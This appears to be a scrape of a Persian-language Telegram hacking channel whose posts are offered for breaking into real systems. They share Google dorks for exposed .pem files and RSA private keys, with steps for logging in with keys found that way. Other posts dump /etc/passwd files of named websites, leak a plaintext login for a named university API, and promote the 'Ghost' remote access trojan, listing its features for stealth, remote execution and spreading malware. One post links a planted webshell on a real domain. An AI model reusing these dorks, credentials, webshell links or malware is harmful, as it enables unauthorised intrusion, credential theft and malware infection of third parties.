0Day.Today | Learn Exploit | Zero World | Dark web |
14.2K subscribers
1.11K photos
76 videos
462 files
1.09K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
#Dork #2019 #Access the #Pem File

@~Dork :
intitle:"index of" ".pem"

@~Description :
شما با استفاده از این دورک میتوانید به میل های شخصی که در سایت وجود داره دسترسی پیدا کنید و مجوز ها رو بخونید. (فایل های .pem و crt.)

@~Example :
http://www.i.cz/ca/ICZ%20Group%20Root%20CA.pem

@LearnExploit 🌀
IR0Day.Today BOY'S
#Access #DB #Server #Shell

😸حالشو ببرید (پرتال دانشجویان):

root::0:0::0:0:Charlie &:/root:/bin/csh toor:*:0:0::0:0:Bourne-again Superuser:/root: daemon:*:1:31::0:0:The devil himself:/root: operator:*:2:20::0:0:System &:/usr/guest/operator:/bin/csh bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/dev/null games:*:7:13::0:0:Games pseudo-user:/usr/games: uucp:*:66:1::0:0:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico nobody:*:32767:9999::0:0:Unprivileged user:/nonexistent:/dev/null ingres:*:267:74::0:0:& Group:/usr/ingres:/bin/csh falken:*:32766:31::0:0:Prof. Stephen &:/usr/games:/usr/g bames/wargames

Target : https://Stuff.mit.edu/

IR0Day.Today Guy's
@LearnExploit
@Tech_Army
#Password #Root #Access #Config #Login

#_ جهت دانلود هر یک کلیک کنید.

$_ pwd.db
$_ login.conf

Target : http://pocketbsd.install.sh/

IR0Day.Today Guy's
@LearnExploit
@Tech_Army
#Login #Config #Access #Password #Root

یوزر و پسورد :()
$Target : host = 'https://bd-api.ncsa.illinois.edu',

username = 'kooper@illinois.edu' password = 'hello123'

IR0Day.Today Boy's
@LearnExploit
@Tech_Army
#Dork
با سلام خدمت تمامی اعضای
امروز قراره نحوه ی دسترسی به روتر از طریق RSA-Private Key رو برای شما اموزش بدیم :


برای اینکه بفهمید RSA-Private Key چیست!؟
اینجا کلیک کنید.

نحوه ی پیدا کردن RSA-Private Key :
#Dork :
"-----BEGIN RSA PRIVATE KEY-----" inurl:id_rsa

#Access :
#_نحوه ی دسترسی :

۱- نرم افزار putty را روی سیستم خود باز کنید و یک پروفایل جدید بسیازید.
(فایل RSA رو‌به صورت ppk. سیو کنید)

۲- از نوار سمت راست روی گزینه SSH وسپس روی گزینه Auth کلیک کنید.

۳- فایل private key خود را اضافه کنید و بر روی open کلیک کنید
.
#Description :
بعضی مواقع با کرک هش هم‌میتونید به این مقادیر User & pass دسترسی پیدا کنید.

IR0Day.Today
@LearnExploit
@Tech_Army
#Config #Pw #Access

اینم از این :()
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:999:998:User for polkitd:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:998:996::/var/lib/chrony:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin dovenull:x:997:994:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin mailnull:x:47:47:Exim:/var/spool/mqueue:/bin/false cpanelroundcube:x:201:201::/var/cpanel/userhomes/cpanelroundcube:/bin/false mailman:x:996:992:GNU Mailing List Manager:/usr/local/cpanel/3rdparty/mailman:/bin/bash cpanelphpmyadmin:x:995:991:phpMyAdmin for cPanel & WHM:/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell cpanelphppgadmin:x:994:990:phpPgAdmin for cPanel & WHM:/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell cpanel:x:202:202::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell cpanellogin:x:203:203::/var/cpanel/userhomes/cpanellogin:/usr/local/cpanel/bin/noshell cpaneleximfilter:x:204:204::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell cpaneleximscanner:x:205:205::/var/cpanel/userhomes/cpaneleximscanner:/usr/local/cpanel/bin/noshell cpanelconnecttrack:x:206:206::/var/cpanel/userhomes/cpanelconnecttrack:/usr/local/cpanel/bin/noshell cpanelanalytics:x:207:207::/var/cpanel/userhomes/cpanelanalytics:/usr/local/cpanel/bin/noshell cpanelcabcache:x:208:208::/var/cpanel/userhomes/cpanelcabcache:/usr/local/cpanel/bin/noshell cpanelrrdtool:x:209:209::/var/cpanel/userhomes/cpanelrrdtool:/usr/local/cpanel/bin/noshell mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false cpses:x:993:989::/var/cpanel/cpses:/sbin/nologin secretoftruelife:x:1001:1002::/home/secretoftruelife:/bin/bash mediagenies:x:1002:1003::/home/mediagenies:/bin/bash clamav:x:1003:1004::/home/clamav:/sbin/nologin aspiredesign:x:1005:1006::/home/aspiredesign:/usr/local/cpanel/bin/noshell

Target~:
https://billrockworld.com

SysInfo~:
CentOS Linux release 7.8.2003 (Core)

SSH-Config~:
Download

IR0Day.Today Boy's
@LearnExploit
@Tech_Army
👻 Ghost 👻

👻 RAT (Remote Access Trojan) - Silent Botnet - Full Remote Command-Line Access - Download & Execute Programs - Spread Virus' & Malware

💬
ghost is a light RAT that gives the server/attacker full remote access to the user's command-line interpreter (cmd.exe). They are allowed to execute commands silently without the client/zombie noticing. The server/attacker is also given the ability to download and execute files on the client/zombie's computer. This is also a silent and hidden process. Like most Remote Access Trojans, this download and execution ability helps distribute viruses and other pieces of malware.

👁‍🗨
This malware is distributed simply by running zombie.exe. This file name can be changed to whatever. There is no restriction. When run, it searches for the first two arguments (IP & Port). If neither is provided, the program doesn't run. With that being said, make sure you provide the server's IP and Port in the command-line arguments. Example:
zombie.exe 127.0.0.1 27015



📊 Features:
⚪️ Remote command execution
⚪️ Silent background process
⚪️ Download and run file (Hidden)
⚪️ Safe Mode startup
⚪️ Will automatically connect to the server
⚪️ Data sent and received is encrypted (substitution cipher)
⚪️ Files are hidden
⚪️ Installed Antivirus shown to server
⚪️ Easily spread malware through download feature
⚪️ Startup info doesn't show in msconfig or other startup checking programs like CCleaner
⚪️ Disable Task Manager

😸 Github

⬇️ Download
🔒 BugCod3

#Rat #Malware #Remote #Access

🔥 0Day.Today
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
شل برای تمرین فقط استفاده کنید حذفش نکنید بزارید بقیه هم استفاده کنن ❤️

https://bittergravity.com/test/fox63.php


#hack #Website #access #webshell
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101

@Bvrce